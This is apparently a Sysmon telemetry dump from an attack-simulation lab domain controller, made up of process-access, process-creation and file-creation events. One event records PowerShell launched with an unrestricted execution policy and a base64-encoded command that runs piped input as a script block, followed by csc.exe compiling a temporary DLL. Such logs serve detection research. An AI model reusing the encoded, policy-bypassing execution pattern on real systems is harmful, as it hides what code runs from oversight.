10341000x80000000000000009Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:12.983{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-EE02-000000007E01}4480C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000008Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:12.990{733EE690-3DD0-5F80-EE02-000000007E01}4480C:\Windows\System32\wbem\unsecapp.exe10.0.14393.2515 (rs1_release_1.180830-1044)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3C67-5F80-E703-000000000000}0x3e70SystemMD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{733EE690-3C68-5F80-0C00-000000007E01}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000007Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:12.952{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000006Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:12.952{733EE690-3C66-5F80-0A00-000000007E01}8561168C:\Windows\system32\services.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000005Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:12.936{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000004Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:12.936{733EE690-3C66-5F80-0A00-000000007E01}856944C:\Windows\system32\services.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000003Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:12.920{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe12.0System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3C67-5F80-E703-000000000000}0x3e70SystemMD5=0475D48604B7C8E7D9DD7605B6A5930F,SHA256=55BAD23D049A2FD801B8DECDC5D960D4E27D7F92541E8B37557B7495CA5561A2,IMPHASH=49AAA307415968B34D3FD1A72DEE6C71{733EE690-3C66-5F80-0A00-000000007E01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 434400x80000000000000002Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local2020-10-09 10:39:13.014Started12.04.40 10341000x8000000000000000143Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3DD2-5F80-F002-000000007E01}47364856C:\Windows\system32\conhost.exe{733EE690-3DD2-5F80-F502-000000007E01}2428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000142Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000141Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000140Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD2-5F80-F502-000000007E01}2428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000139Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000138Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000137Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000136Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000135Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3DD2-5F80-F302-000000007E01}42404948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DD2-5F80-F502-000000007E01}2428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c19a9|UNKNOWN(00007FFA1558B68F) 10341000x8000000000000000134Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000133Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000132Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.968{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000131Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.938{733EE690-3DD2-5F80-F502-000000007E01}2428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\mlg1nete.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD2-5F80-EE26-110000000000}0x1126ee0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000130Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.921{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\mlg1nete.cmdline2020-10-09 10:39:14.921 11241100x8000000000000000129Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.localDLL2020-10-09 10:39:14.921{733EE690-3DD2-5F80-F302-000000007E01}4240C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\mlg1nete.dll2020-10-09 10:39:14.921 10341000x8000000000000000128Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.483{733EE690-3DD2-5F80-F002-000000007E01}47364856C:\Windows\system32\conhost.exe{733EE690-3DD2-5F80-F402-000000007E01}2624C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000127Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.483{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000126Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.483{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000125Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:14.483{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000124Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 